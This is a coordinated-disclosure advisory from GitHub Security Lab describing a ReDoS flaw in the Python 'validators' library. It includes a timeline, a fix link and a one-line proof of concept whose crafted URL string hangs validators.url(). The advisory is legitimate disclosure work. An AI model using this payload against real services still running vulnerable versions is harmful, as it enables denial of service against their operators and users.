Coordinated Disclosure Timeline
- 2021-08-31: Created an issue asking for contact details.
- 2023-03-03: Issue closed.
- 2023-03-07: Confirmed that the poc still works.
- 2023-03-07: Posted a comment asking for contact details.
- 2023-03-08: In response to my comment, @joe733 added a security.md to the repo
- 2023-03-09: I emailed the report to @joe733.
- 2023-03-16: Created a PR to fix the issue: https://github.com/python-validators/validators/pull/243
- 2023-03-17: Received an email from @joe733, notifying that a more comprehensive fix is in progress: https://github.com/python-validators/validators/pull/245
- 2023-03-18: Fix merged: https://github.com/python-validators/validators/pull/245
validators contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service).
ReDoS, or Regular Expression Denial of Service, is a vulnerability affecting inefficient regular expressions which can perform extremely badly when run on a crafted input string.
The vulnerable regular expression is here
Please follow these steps to reproduce the issue:
- Install validators:
pip3 install validators
- Run the code below with
import validators # Doesn't terminate! print(validators.url("http://0.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00.00."))
This vulnerability was found by the CodeQL ReDoS query for Python, which was still experimental when it found this bug in 2021, but is now included in the standard suite of queries used by code scanning.
This issue may lead to a denial of service.
This issue was discovered by GitHub team members @erik-krogh (Erik Krogh Kristensen) and @yoff (Rasmus Petersen).
You can contact the GHSL team at
email@example.com, please include a reference to
GHSL-2021-110 in any communication regarding this issue.